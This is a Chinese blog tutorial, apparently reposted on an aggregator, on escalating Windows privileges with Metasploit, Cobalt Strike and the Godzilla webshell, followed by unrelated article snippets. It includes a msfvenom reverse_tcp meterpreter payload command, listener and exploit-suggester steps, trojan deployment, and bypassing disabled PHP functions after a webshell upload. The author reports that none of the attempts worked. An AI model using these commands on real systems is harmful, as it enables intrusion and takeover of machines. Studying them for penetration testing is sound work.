权限束缚术:windows工具自动化权限提升

news2025/1/6 19:16:38

前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文整理利用工具全自动化提权的相关操作方法

因为我没有相关的环境复现,所以没有成功

不过复现的操作就是下面整理的操作

溢出漏洞提权原理

利用溢出漏洞提权,实际上就是一次判断过往的溢出漏洞编号的payload,然后根据未打补丁的溢出漏洞提权。

所以我们要做两个事情,一次判断有没有这个漏洞,然后利用这个漏洞进行提权。

具体操作:(手工需要做的)

1.获取网站权限

2.上传判断漏洞脚本

3.发现漏洞,上传利用漏洞脚本

4.完结散花

溢出漏洞原理

就是字符超出了分配的内存空间,覆盖了其他区域的内存空间,而这个区域又能执行高权限代码。

这样就成了溢出漏洞。

提权信息收集

目标:

获取操作系统,漏洞补丁,系统位数,杀毒软件,网络情况,当前权限等信息

常用信息收集指令

命令作用
ver获取操作系统版本信息
systeminfo整个系统的详细信息
whoami查看当前用户权限
netstat -ano查看当前端口情况(查杀毒软件)
tasklist /svc列出所有运行的进程

msf提权

前提简述

我们平常用的kali,或者服务器上的msf都是开源版本。漏洞收集比较少而且不少bug。

所以这里演示的msf提权是用msf提权的思路和操作,在虚拟机中模拟(win11也不是服务器的win版本)所以会有误报的情况。主要整理提权的操作和思路。

如果想用高质量msf需要自己买正版或者破解的。

msf提权总体流程思路

生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[自己ip] LPORT=[接收端口] -f exe -o [载荷名称].exe

创建监听器

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp
set lhost [自己ip]
set lport [接收端口]
exploit

判断目标系统是否存在漏洞

background

use post/multi/recon/local_exploit_suggester
set showdescription true

set session [目标session的id]

如果存在利用EXP溢出提权
use [漏洞类型]
set session 1
exploit

整体操作案例(没成功)

背景介绍

靶机:win11虚拟机(ip:192.168.128.129)

己方:kali虚拟机(ip:192.168.128.135)

生成木马

 

设置监听

先打开msf

输入上述设置监听命令

现在给虚拟机整上木马。

点击木马后kali接收到session

 现在虽然有了目标权限,但是还不是最高权限,比如直接删c盘系统文件等就会受挫。这时就要提权。

这里的权限是我设置的yeyin这个账户的权限,windows最高权限用户是system

我们需要先退出命令执行界面

输入:background

然后再输入上述启动扫描的模块

现在就开始扫描了。

绿色的就是可能存在的漏洞。

当然并不一定能成功,只是可能存在。

接下来是利用漏洞环节。

使用相关漏洞载荷。

这里跟着上面输入就行了。

因为我的电脑配置很差,开两台虚拟机时间久了一台就会进入睡眠状态,并且是用另一台时一台就会进入睡眠。导致我的session连接不上了。

如果成功了的话就会再开一个session用户变为system。

如果不成功就说明没有这个漏洞。

可以考虑别的方法或者是用他的付费版。

cs提权

环境配置

首先我们把Cobalt_Strike的文件夹给传输到服务器上。

这里我使用的是FTP传输,cs是狐狸工作室的里面自带的。

FTP可以在宝塔的对应界面下载,工具箱可以去狐狸公众号要,也可以自己从github下载。

狐狸里自带了插件比较good。

(版本不如直接下的好,但是省事)

传输上去后用命令把对应的文件移动到root用户的文件夹中。

mv 文件所在位置 ~

 在工具的文件夹中输入这两个命令,给与工具权限才能正常运行。

chmod +x ./teamserver

chmod +x ./TeamServerImage

 给好权限后就输入这个指令设置密码

./teamserver [ip] [密码]

 (我服务器运行的东西太多了。。。然后没内存用了,系统不让开。。我在kali里演示后面的吧)

(突然出报错让我脑阔一蹦)

你们走到这一步应该就是可以了。

(人穷事情就是麻烦。。唉)

kali中跟上面配置一样,然后启动就行了

人穷。。走哪都不顺。。。唉。。。

这样cs就启动完成了。

连接服务端

启动客户端,连接服务端。

别名:瞎写

主机:服务端ip

端口:默认50050

用户:瞎写

密码:指定的密码

之后就是跟msf操作相类似的传马。

创建监听器

点监听器,然后点下面的添加

添加配置(类似msf)

配置完成

 生成木马

点生成载荷

配置好

生成木马

杀毒软件会杀掉,自己添加一下信任。

木马上线

放到目标机器中

双击运行获得权限

权限提升

权限是当前用户的权限,不够,需要提权。

cs内置的提权没什软用,所以用了狐狸的cs中自带的插件进行提权。

插件位置在下面目录中

ONE-FOX集成工具箱_V6公开版_by狐狸\gui_other\Cobalt_Strike_4.7\plugin

我们点开里面的文件夹选中cna文件就可以了。

接下来,对目标的选项中就会多了一些插件的选项。

使用权限提升的功能中的判断有什么漏洞,然后根据爆出的漏洞,使用对应漏洞就可以了。

这里我的虚拟机是windows11,不符合他的版本。。所以也没成功。

如果成功的话,会产生一个新的木马,这个木马就是system用户的权限。

宝塔集成软件提权

整理一种情况

一般宝塔这类的集成软件搭建的网站,上传shell后都会有很高的权限。

但是有时候集成软件为了安全,会限制我们的功能。导致我们有种没有权限的假象。

大致原理是:

我们shell是执行一些php代码之类的方式来进行命令执行,他会禁用一些函数,让我们无法执行相关的代码。(跟安装了waf很像)

我们通过绕过这些规则进行所谓的提权操作

具体使用哥斯拉操作

上传webshell后门后可能会遇到一些无法正常使用的情况。

无法正常查看或者切换目录

用它可以绕过

无法正常执行系统命令

用它执行命令即可

内置提权

他里面也有msf

可以利用他进行绕过了这些安全防护之后,再生成payload,传到我们电脑上,就是高权限了。

工具自动化提权优劣分析总结

优点:

真的快,而且方便,不需要自己找漏洞,也不需要自己搞载荷。快捷入侵提权。

缺点:

上面那几个我都没复现成功。

主要是我全是最新系统,而工具都是集成的老的漏洞,没人给你实时更新,除非花马内。

所以遇到新系统就会很难自动化提权。

这时就需要手动提权。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1969517.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

极简聊天室-websocket版

再写一个极简聊天室的websocket版,在本例中,websocket仅用于服务器向客户端传输信息,客户端向服务器发送信息是传统的http post方式,用axios来实现的,当然websocket本身是支持双向通信,主要是为了方便跟前面…

Selenium 无法定位元素的几种解决方案

🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 1、frame/iframe表单嵌套 WebDriver只能在一个页面上对元素识别与定位,对于frame/iframe表单内嵌的页面元素无法直接定位。 解决方法: d…

LLM大模型实战项目--基于ChatGLM2的小书虫文档阅读助手

本文介绍如此从零开始编写一个基于ChatGLM2的文档阅读助手 一、项目介绍 二、获取API接口 三、环境配置 四、代码实现 五、效果展示 一、项目介绍 小书虫📚 文档阅读助手是一个基于百度千帆大模型平台的Web应用程序,核心是清华大学训练的ChatGLM2大模…

算法加项目

1.仅加号 很简单&#xff0c;找到每次添加后最小的即可&#xff0c;这里不做演示。 2.采药 dp&#xff0c;for1数目&#xff0c;for2时间&#xff0c;简单的dp模板题目。 #include<bits/stdc.h> using namespace std; int n,m; const int N105,M105; long long a[M],b[M…

TInyWebServer面试题

一、项目介绍 &#xff08;1&#xff09;为什么要做这样一个项目&#xff1f; &#xff08;2&#xff09;介绍一下你的项目 这个项⽬是我在学习计算机⽹络和Linux socket编程过程中独⽴开发的轻量级Web服务器&#xff0c;服务器的⽹络模型是主从reactor加线程池的模式&#xf…

VMware虚拟机网络模式配置详解【原理,功能,特点层面】

VMware虚拟机网络模式配置详解【原理,功能,特点层面】 文章目录 VMware虚拟机网络模式配置详解【原理,功能,特点层面】桥接模式&#xff08;Bridged&#xff09;原理功能点介绍虚拟网络编辑器配置虚拟机配置 配置教程编辑-虚拟网络编辑器虚拟机网络配置 特点 NAT模式概念功能点…

数学建模--智能算法之蚁群优化算法

目录 基本原理 算法步骤 Python代码示例 应用领域 特点及改进 蚁群优化算法在解决哪些具体组合优化问题方面表现最为突出&#xff1f; 如何有效地改进蚁群优化算法以提高其收敛速度和避免陷入局部最优的问题&#xff1f; 蚁群优化算法与其他群体智能优化算法&#xff0…

三维旋转矩阵

前言 本文讲述三维旋转的矩阵推导&#xff0c;推导过程遵循下面的规则&#xff1a; 本文的坐标系是基于右手坐标系的逆时针旋转为正向旋转 围绕坐标轴的旋转 x x x轴 我们假设旋转的点为 P P P 假设旋转之前点 P P P的坐标为 ( x 0 , y 0 , z 0 ) (x_0,y_0,z_0) (x0​,y0​,…

CAN总线中注入拓展帧、远程帧,CAPL通用函数。

🍅 我是蚂蚁小兵,专注于车载诊断领域,尤其擅长于对CANoe工具的使用🍅 寻找组织 ,答疑解惑,摸鱼聊天,博客源码,点击加入👉【相亲相爱一家人】🍅 玩转CANoe,博客目录大全,点击跳转👉 【测试需求】:CAN总线要求DUT 接收到非预期的扩展帧、远程帧时,通信正常,…

vulhub:nginx解析漏洞nginx_parsing

这个解析漏洞其实是PHP CGI的漏洞&#xff0c;在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的&#xff0c;当URL中有不存在的文件&#xff0c;PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件 条件&#xff1a; Ngi…

釉面陶瓷器皿和玻璃器皿 SOR/2016-175认证

釉面陶瓷制品和釉面玻璃制品设计用于盛装食品&#xff0c;包括扁平餐具、杯子或马克杯、小号或大号凹形器皿&#xff08;杯子或马克杯除外&#xff09;以及水罐。这些法规适用于以下釉面陶瓷制品和釉面玻璃制品&#xff1a; 完全或部分由陶瓷或玻璃制成完全或部分覆盖含铅或镉…

MATLAB(12)预测模型

一、前言 在MATLAB中创建一个预测模型通常涉及多个步骤&#xff0c;包括数据准备、模型选择、训练模型、评估模型以及使用模型进行预测。以下是一个简化的例子&#xff0c;说明如何使用MATLAB中的内置函数来创建一个基于线性回归的预测模型。这个例子将使用MATLAB的fitlm函数来…

C语言函数初识

文章目录 &#x1f34a;自我介绍&#x1f34a;函数初识前言概念具体实例解释函数的实用性 你的点赞评论就是对博主最大的鼓励 当然喜欢的小伙伴可以&#xff1a;点赞关注评论收藏&#xff08;一键四连&#xff09;哦~ &#x1f34a;自我介绍 Hello,大家好&#xff0c;我是小珑也…

院人全年无休计划背后,芒果把To C综艺玩明白了

《种地吧》掉粉闹得沸沸扬扬&#xff0c;不少禾伙人希望芒果把“十个勤天”挖走&#xff0c;毕竟芒果做综艺群像确实是一把好手&#xff0c;“院人”就是最好的例子。 在#种地吧粉丝让芒果把十个勤天挖走#的话题登上热搜之后&#xff0c;“学分们”&#xff08;院人粉丝&#…

JS等待所有方法执行完成在执行下一个方法,promise All

在工作中会遇到这样一个场景&#xff0c;前端需要拿到不同接口返回的结果在执行某个逻辑&#xff0c;当使用链式那样的方式去请求&#xff0c;等一个接口响应完在请求下一个接口&#xff0c;这种方法就会导致请求时间特别长。这个时候就可以使用promise all&#xff0c;同时请求…

国产麒麟操作系统下搞单机版

去年纪委单位的一个项目&#xff0c;因为单位保密性质&#xff0c;档案必须要保密&#xff0c;要求采用单机版&#xff0c; 要求跟EXE那样&#xff0c;双击打开&#xff0c;阿公单位信息人员电脑操作水平化滞后还是相当严重啊。 去年已经给他花了时间按他们的要求实现了。 上周…

【直角三角形】python刷题记录

R3-新增每日一题打卡。 目录 思路&#xff08;遍历中间乘法原理&#xff09;&#xff1a; 乘法原理如下&#xff1a; ps: python的zip操作 矩阵转置 并行遍历 对象组合 创建字典 处理不等迭代长度 思路&#xff1a; 这题遍历主要从直角点开始遍历&#xff0c;用到了…

软科中国大学排名爬虫+数据可视化

这一期是关于软科中国大学排名的爬虫分析 目标网址&#xff1a;https://www.shanghairanking.cn/rankings/bcur/2024 每页30所学校信息&#xff0c;共20页 点击翻页&#xff0c;你发现网址没有发生变化&#xff0c;说明该页面信息应该是利用js实现动态加载数据的方式展示的&am…

基于51单片机的篮球计分器Protues仿真设计(LCD12864显示)

目录 一、设计背景 二、设计要求 三、仿真演示 四、程序展示&#xff08;部分&#xff09; 一、设计背景 近年来&#xff0c;随着国家对体育事业的日益重视&#xff0c;体育运动在全民中的普及程度显著提高&#xff0c;篮球作为一项广受欢迎的运动项目&#xff0c;其比赛与…

Linux云计算 |【第二阶段】CLUSTER-DAY1

主要内容&#xff1a; 集群概念、LVS概述、LVS-NAT集群、LVS-DR集群 一、集群概念 集群&#xff08;Cluster&#xff09;是指将多台计算机&#xff08;节点&#xff09;通过网络连接在一起&#xff0c;形成一个统一的计算资源池&#xff0c;共同完成一项或多项任务的系统。集…